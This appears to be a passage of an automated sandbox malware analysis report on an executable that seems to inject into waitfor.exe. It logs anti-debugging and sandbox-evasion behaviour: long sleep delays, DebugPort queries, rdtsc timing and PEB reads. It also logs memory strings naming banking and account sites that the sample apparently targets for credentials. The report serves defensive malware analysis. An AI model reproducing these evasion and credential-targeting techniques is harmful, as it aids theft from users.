                Source: C:\Users\user\Desktop\suBpo1g13Q.exe TID: 7264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 8028Thread sleep count: 2186 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 8028Thread sleep time: -4372000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 8028Thread sleep count: 7785 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 8028Thread sleep time: -15570000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140Thread sleep time: -49500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0082CB90 FindFirstFileW,FindNextFileW,FindClose,7_2_0082CB90
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: FxK39HI69.7.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: FxK39HI69.7.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: FxK39HI69.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: FxK39HI69.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: iBkWOgpZKSoi.exe, 00000008.00000002.3809595361.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                Source: FxK39HI69.7.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: FxK39HI69.7.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: FxK39HI69.7.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: FxK39HI69.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: FxK39HI69.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: FxK39HI69.7.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: FxK39HI69.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: FxK39HI69.7.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: FxK39HI69.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: FxK39HI69.7.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1954223503.000001CFC1AEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: FxK39HI69.7.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: FxK39HI69.7.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: FxK39HI69.7.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: FxK39HI69.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: FxK39HI69.7.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: FxK39HI69.7.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: FxK39HI69.7.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: FxK39HI69.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: FxK39HI69.7.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: FxK39HI69.7.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: FxK39HI69.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: FxK39HI69.7.drBinary or memory string: global block list test formVMware20,11696501413
                Source: FxK39HI69.7.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: FxK39HI69.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: FxK39HI69.7.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: FxK39HI69.7.drBinary or memory string: discord.comVMware20,11696501413f
                Source: FxK39HI69.7.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E096E rdtsc 4_2_014E096E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00418073 LdrLoadDll,4_2_00418073
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01538158 mov eax, dword ptr fs:[00000030h]4_2_01538158
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01534144 mov eax, dword ptr fs:[00000030h]4_2_01534144
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01534144 mov eax, dword ptr fs:[00000030h]4_2_01534144
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01534144 mov ecx, dword ptr fs:[00000030h]4_2_01534144
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01534144 mov eax, dword ptr fs:[00000030h]4_2_01534144
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01534144 mov eax, dword ptr fs:[00000030h]4_2_01534144
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6154 mov eax, dword ptr fs:[00000030h]4_2_014A6154
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6154 mov eax, dword ptr fs:[00000030h]4_2_014A6154
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149C156 mov eax, dword ptr fs:[00000030h]4_2_0149C156
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574164 mov eax, dword ptr fs:[00000030h]4_2_01574164
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574164 mov eax, dword ptr fs:[00000030h]4_2_01574164
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01560115 mov eax, dword ptr fs:[00000030h]4_2_01560115
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154A118 mov ecx, dword ptr fs:[00000030h]4_2_0154A118
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154A118 mov eax, dword ptr fs:[00000030h]4_2_0154A118
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154A118 mov eax, dword ptr fs:[00000030h]4_2_0154A118
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154A118 mov eax, dword ptr fs:[00000030h]4_2_0154A118
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov ecx, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov ecx, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov ecx, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E10E mov ecx, dword ptr fs:[00000030h]4_2_0154E10E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D0124 mov eax, dword ptr fs:[00000030h]4_2_014D0124
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E1D0 mov eax, dword ptr fs:[00000030h]4_2_0151E1D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E1D0 mov eax, dword ptr fs:[00000030h]4_2_0151E1D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0151E1D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E1D0 mov eax, dword ptr fs:[00000030h]4_2_0151E1D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E1D0 mov eax, dword ptr fs:[00000030h]4_2_0151E1D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015661C3 mov eax, dword ptr fs:[00000030h]4_2_015661C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015661C3 mov eax, dword ptr fs:[00000030h]4_2_015661C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015761E5 mov eax, dword ptr fs:[00000030h]4_2_015761E5
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D01F8 mov eax, dword ptr fs:[00000030h]4_2_014D01F8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E0185 mov eax, dword ptr fs:[00000030h]4_2_014E0185
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152019F mov eax, dword ptr fs:[00000030h]4_2_0152019F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152019F mov eax, dword ptr fs:[00000030h]4_2_0152019F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152019F mov eax, dword ptr fs:[00000030h]4_2_0152019F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152019F mov eax, dword ptr fs:[00000030h]4_2_0152019F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01544180 mov eax, dword ptr fs:[00000030h]4_2_01544180
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01544180 mov eax, dword ptr fs:[00000030h]4_2_01544180
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155C188 mov eax, dword ptr fs:[00000030h]4_2_0155C188
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155C188 mov eax, dword ptr fs:[00000030h]4_2_0155C188
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149A197 mov eax, dword ptr fs:[00000030h]4_2_0149A197
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149A197 mov eax, dword ptr fs:[00000030h]4_2_0149A197
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149A197 mov eax, dword ptr fs:[00000030h]4_2_0149A197
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526050 mov eax, dword ptr fs:[00000030h]4_2_01526050
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A2050 mov eax, dword ptr fs:[00000030h]4_2_014A2050
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CC073 mov eax, dword ptr fs:[00000030h]4_2_014CC073
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01524000 mov ecx, dword ptr fs:[00000030h]4_2_01524000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01542000 mov eax, dword ptr fs:[00000030h]4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01542000 mov eax, dword ptr fs:[00000030h]4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01542000 mov eax, dword ptr fs:[00000030h]4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01542000 mov eax, dword ptr fs:[00000030h]4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01542000 mov eax, dword ptr fs:[00000030h]4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01542000 mov eax, dword ptr fs:[00000030h]4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01542000 mov eax, dword ptr fs:[00000030h]4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01542000 mov eax, dword ptr fs:[00000030h]4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE016 mov eax, dword ptr fs:[00000030h]4_2_014BE016
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE016 mov eax, dword ptr fs:[00000030h]4_2_014BE016
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE016 mov eax, dword ptr fs:[00000030h]4_2_014BE016
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE016 mov eax, dword ptr fs:[00000030h]4_2_014BE016
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01536030 mov eax, dword ptr fs:[00000030h]4_2_01536030
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149A020 mov eax, dword ptr fs:[00000030h]4_2_0149A020
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149C020 mov eax, dword ptr fs:[00000030h]4_2_0149C020
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015220DE mov eax, dword ptr fs:[00000030h]4_2_015220DE
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A80E9 mov eax, dword ptr fs:[00000030h]4_2_014A80E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0149A0E3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015260E0 mov eax, dword ptr fs:[00000030h]4_2_015260E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149C0F0 mov eax, dword ptr fs:[00000030h]4_2_0149C0F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E20F0 mov ecx, dword ptr fs:[00000030h]4_2_014E20F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A208A mov eax, dword ptr fs:[00000030h]4_2_014A208A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014980A0 mov eax, dword ptr fs:[00000030h]4_2_014980A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015660B8 mov eax, dword ptr fs:[00000030h]4_2_015660B8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015660B8 mov ecx, dword ptr fs:[00000030h]4_2_015660B8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015380A8 mov eax, dword ptr fs:[00000030h]4_2_015380A8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156A352 mov eax, dword ptr fs:[00000030h]4_2_0156A352
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01548350 mov ecx, dword ptr fs:[00000030h]4_2_01548350
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152035C mov eax, dword ptr fs:[00000030h]4_2_0152035C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152035C mov eax, dword ptr fs:[00000030h]4_2_0152035C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152035C mov eax, dword ptr fs:[00000030h]4_2_0152035C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152035C mov ecx, dword ptr fs:[00000030h]4_2_0152035C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152035C mov eax, dword ptr fs:[00000030h]4_2_0152035C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152035C mov eax, dword ptr fs:[00000030h]4_2_0152035C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0157634F mov eax, dword ptr fs:[00000030h]4_2_0157634F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01522349 mov eax, dword ptr fs:[00000030h]4_2_01522349
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154437C mov eax, dword ptr fs:[00000030h]4_2_0154437C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA30B mov eax, dword ptr fs:[00000030h]4_2_014DA30B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA30B mov eax, dword ptr fs:[00000030h]4_2_014DA30B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA30B mov eax, dword ptr fs:[00000030h]4_2_014DA30B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149C310 mov ecx, dword ptr fs:[00000030h]4_2_0149C310
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C0310 mov ecx, dword ptr fs:[00000030h]4_2_014C0310
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01578324 mov eax, dword ptr fs:[00000030h]4_2_01578324
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01578324 mov ecx, dword ptr fs:[00000030h]4_2_01578324
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01578324 mov eax, dword ptr fs:[00000030h]4_2_01578324
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01578324 mov eax, dword ptr fs:[00000030h]4_2_01578324
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015443D4 mov eax, dword ptr fs:[00000030h]4_2_015443D4
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015443D4 mov eax, dword ptr fs:[00000030h]4_2_015443D4
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h]4_2_014AA3C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h]4_2_014AA3C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h]4_2_014AA3C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h]4_2_014AA3C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h]4_2_014AA3C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h]4_2_014AA3C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A83C0 mov eax, dword ptr fs:[00000030h]4_2_014A83C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A83C0 mov eax, dword ptr fs:[00000030h]4_2_014A83C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A83C0 mov eax, dword ptr fs:[00000030h]4_2_014A83C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A83C0 mov eax, dword ptr fs:[00000030h]4_2_014A83C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E3DB mov eax, dword ptr fs:[00000030h]4_2_0154E3DB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E3DB mov eax, dword ptr fs:[00000030h]4_2_0154E3DB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E3DB mov ecx, dword ptr fs:[00000030h]4_2_0154E3DB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154E3DB mov eax, dword ptr fs:[00000030h]4_2_0154E3DB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155C3CD mov eax, dword ptr fs:[00000030h]4_2_0155C3CD
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h]4_2_014B03E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h]4_2_014B03E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h]4_2_014B03E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h]4_2_014B03E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h]4_2_014B03E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h]4_2_014B03E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h]4_2_014B03E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h]4_2_014B03E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D63FF mov eax, dword ptr fs:[00000030h]4_2_014D63FF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE3F0 mov eax, dword ptr fs:[00000030h]4_2_014BE3F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE3F0 mov eax, dword ptr fs:[00000030h]4_2_014BE3F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE3F0 mov eax, dword ptr fs:[00000030h]4_2_014BE3F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E388 mov eax, dword ptr fs:[00000030h]4_2_0149E388
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E388 mov eax, dword ptr fs:[00000030h]4_2_0149E388
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E388 mov eax, dword ptr fs:[00000030h]4_2_0149E388
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C438F mov eax, dword ptr fs:[00000030h]4_2_014C438F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C438F mov eax, dword ptr fs:[00000030h]4_2_014C438F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01498397 mov eax, dword ptr fs:[00000030h]4_2_01498397
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01498397 mov eax, dword ptr fs:[00000030h]4_2_01498397
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01498397 mov eax, dword ptr fs:[00000030h]4_2_01498397
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155A250 mov eax, dword ptr fs:[00000030h]4_2_0155A250
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155A250 mov eax, dword ptr fs:[00000030h]4_2_0155A250
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0157625D mov eax, dword ptr fs:[00000030h]4_2_0157625D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01528243 mov eax, dword ptr fs:[00000030h]4_2_01528243
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01528243 mov ecx, dword ptr fs:[00000030h]4_2_01528243
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6259 mov eax, dword ptr fs:[00000030h]4_2_014A6259
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149A250 mov eax, dword ptr fs:[00000030h]4_2_0149A250
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550274 mov eax, dword ptr fs:[00000030h]4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149826B mov eax, dword ptr fs:[00000030h]4_2_0149826B
